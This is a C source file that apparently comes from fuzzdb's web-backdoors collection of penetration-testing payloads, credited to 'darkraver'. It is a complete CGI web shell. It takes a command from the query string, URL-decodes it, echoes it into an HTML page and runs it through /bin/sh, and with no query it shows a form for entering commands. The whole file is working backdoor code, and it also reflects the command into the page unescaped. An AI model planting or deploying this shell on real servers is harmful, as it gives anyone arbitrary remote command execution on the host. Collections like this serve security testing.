fuzzdb/web-backdoors/c/cmd.c
2010-04-22 01:45:45 +00:00

74 lines
1.4 KiB
C
Executable file

//
// cmdcgi.exe 0.1 darkraver (12/05/2005)
//
#include <stdio.h>
char *uri_decode(char *uri) {
int i=0;
int ptr=0;
char *command;
char hexa[3];
char code;
command=(char *)malloc(strlen(uri));
for(i=0;i<strlen(uri);i++) {
switch(*(uri+i)) {
case '+':
*(command+ptr)=' ';
ptr++;
break;
case '%':
sprintf(hexa, "%c%c\x00", *(uri+i+1), *(uri+i+2));
i+=2;
//printf("HEXA: %s\n", hexa);
sscanf(hexa, "%x", &code);
//printf("CODE: %c\n", code);
*(command+ptr)=code;
ptr++;
break;
default:
*(command+ptr)=*(uri+i);
ptr++;
break;
}
}
*(command+ptr)='\0';
return command;
}
int main(int argc, char **argv) {
char *cmd;
printf("Content-type: text/html\n\n");
printf("<html><body>\n");
cmd=(char *)getenv("QUERY_STRING");
if(!cmd || strlen(cmd)==0) {
printf("<hr><p><form method=\"GET\" name=\"myform\" action=\"\">");
printf("<input type=\"text\" name=\"cmd\">");
printf("<input type=\"submit\" value=\"Send\">");
printf("<br><br><hr></form>");
} else {
//printf("QUERY_STRING: %s\n", cmd);
cmd+=4;
cmd=uri_decode(cmd);
printf("<hr><p><b>COMMAND: %s</b><br><br><hr><pre>\n", cmd);
fflush(stdout);
execl("/bin/sh", "/bin/sh", "-c", cmd, 0);
}
}